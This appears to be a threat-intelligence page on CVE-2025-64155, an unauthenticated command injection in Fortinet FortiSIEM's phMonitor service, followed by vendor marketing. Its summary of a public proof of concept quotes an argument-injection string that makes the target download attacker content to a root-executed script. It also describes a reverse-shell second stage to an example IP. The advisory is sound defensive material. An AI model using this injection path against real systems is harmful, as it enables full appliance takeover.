Unauthenticated OS Command Injection in Fortinet FortiSIEM phMonitor
CVE-2025-64155 is a critical OS command injection vulnerability in Fortinet FortiSIEM affecting 7.4.0, 7.3.0 through 7.3.4, 7.1.0 through 7.1.8, 7.0.0 through 7.0.4, and 6.7.0 through 6.7.10. The flaw is in the phMonitor service exposed on TCP port 7900 and is caused by improper neutralization of special elements used in OS commands. Available reporting indicates unauthenticated phMonitor handlers can be reached remotely via crafted TCP requests, and attacker-controlled input can reach shell-invoked logic associated with storage configuration handling, including an argument-injection path into a curl invocation. Public technical analysis describes exploitation leading first to arbitrary file write in the context of the admin user and then, by overwriting a root-executed script such as /opt/charting/redishb.sh, escalation to root and full appliance compromise. Fortinet states the issue affects Super and Worker nodes; Collector nodes, FortiSIEM Cloud, and FortiSIEM 7.5 are reported as not affected.
Are you exposed to this one?
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
Impact, mitigation & remediation
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
Impact
What an attacker gets, and what they’ve been doing with it.
Mitigation
If you can’t patch tonight, do this now.
Remediation
Patch, then assume compromise.
Exploits
1 valid exploit after Mallory filtered fakes, detection scripts, and README-only repos (4 hidden).
Repository contains a working PoC for CVE-2025-64155 (Fortinet FortiSIEM) achieving argument injection → arbitrary file write → root RCE. Structure: - CVE-2025-64155.py: Main exploit. Opens a TLS socket to the FortiSIEM Phoenix Monitor service (default port 7900) and sends a crafted binary-framed message containing an XML <TEST_STORAGE type="elastic"> payload. The key exploit primitive is injection in <cluster_url>, appending extra arguments (e.g., “--next -o /opt/charting/redishb.sh http://10.0.40.83:9200”) to coerce the target’s internal URL-testing script to fetch attacker content and write it to a chosen path. - serve.py: Minimal HTTP server on port 9200 that responds only to GET /_cluster/health?pretty with a bash script (example reverse shell). This is the second-stage content the target is tricked into downloading. - README.md: Usage notes and cautions. Describes editing serve.py payload and cluster_url, running the web server, then running the exploit, and waiting ~1 minute for a cron job to execute the written script. Capabilities: - Remote network exploitation over TLS to a service endpoint. - Forces the target to make an outbound HTTP request to attacker infrastructure. - Writes a script to /opt/charting/redishb.sh and relies on scheduled execution for root code execution (example reverse shell to 10.0.40.83:4447). Overall, this is an operational PoC with a hardcoded example payload and endpoints, intended for controlled testing rather than a generalized framework module.
Affected products & vendors
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
Recent activity
108 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A critical command-injection vulnerability in FortiSIEM that was reported as being under widespread exploitation.
FortiSIEM OS command injection leading to unauthenticated RCE.
A critical vulnerability in Fortinet FortiSIEM that the article states has been exploited in the wild; no additional technical details are provided in the text.
An unauthenticated remote code execution vulnerability in Fortinet FortiSIEM’s phMonitor (pMonitor) service, attributed to improper neutralization of user-supplied input to an exposed API endpoint; described as leading to command injection/arbitrary file write and RCE.
The version that knows your environment.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.